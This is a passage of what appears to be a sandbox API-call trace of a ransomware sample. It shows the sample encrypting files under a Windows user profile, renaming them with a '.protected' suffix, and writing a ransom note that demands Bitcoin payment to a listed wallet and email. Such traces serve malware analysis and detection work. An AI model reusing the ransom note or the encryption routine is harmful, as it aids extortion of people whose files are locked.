pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.protected") returned 77 [0095.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.protected" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.protected")) returned 1 [0095.264] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.264] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.265] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\RESTORE_FILES.txt") returned 61 [0095.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.265] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.265] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.266] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.266] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.266] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.266] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.266] CloseHandle (hObject=0xb4) returned 1 [0095.267] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.267] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.267] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\RESTORE_FILES.txt") returned 48 [0095.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.267] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.267] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.268] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.268] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.268] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.268] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.268] CloseHandle (hObject=0xa4) returned 1 [0095.269] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0095.269] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0095.269] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0095.269] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0095.269] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0095.269] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\*") returned 28 [0095.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.271] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.271] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.271] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.271] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.271] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.271] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\.") returned 28 [0095.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.271] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.271] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\." (normalized: "c:\\users\\default\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.271] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.271] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.271] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\..") returned 29 [0095.271] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.271] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.271] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.272] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.272] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.272] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.272] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.272] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.272] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0095.273] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.273] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0095.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.274] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.274] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.274] CloseHandle (hObject=0xb4) returned 1 [0095.274] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.protected") returned 48 [0095.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.protected" (normalized: "c:\\users\\default\\links\\desktop.ini.protected")) returned 1 [0095.292] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Windows") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files (x86)") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="System Volume Information") returned -1 [0095.292] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.292] StrStrIW (lpFirst="Desktop.lnk", lpSrch=".protected") returned 0x0 [0095.292] lstrcmpW (lpString1="Desktop.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".rar") returned 0x0 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".zip") returned 0x0 [0095.293] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1d3, lpOverlapped=0x0) returned 1 [0095.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1d3, lpOverlapped=0x0) returned 1 [0095.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.294] CloseHandle (hObject=0xb4) returned 1 [0095.294] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.protected") returned 48 [0095.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.protected" (normalized: "c:\\users\\default\\links\\desktop.lnk.protected")) returned 1 [0095.295] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Windows") returned -1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files") returned -1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files (x86)") returned -1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$Recycle.bin") returned 1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="System Volume Information") returned -1 [0095.295] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.295] StrStrIW (lpFirst="Downloads.lnk", lpSrch=".protected") returned 0x0 [0095.295] lstrcmpW (lpString1="Downloads.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".rar") returned 0x0 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".zip") returned 0x0 [0095.296] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x37e, lpOverlapped=0x0) returned 1 [0095.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x37e, lpOverlapped=0x0) returned 1 [0095.346] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.346] CloseHandle (hObject=0xb4) returned 1 [0095.346] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.protected") returned 50 [0095.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.protected" (normalized: "c:\\users\\default\\links\\downloads.lnk.protected")) returned 1 [0095.347] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Windows") returned -1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files") returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files (x86)") returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$Recycle.bin") returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="System Volume Information") returned -1 [0095.347] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.347] StrStrIW (lpFirst="RecentPlaces.lnk", lpSrch=".protected") returned 0x0 [0095.347] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".rar") returned 0x0 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".zip") returned 0x0 [0095.348] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x16b, 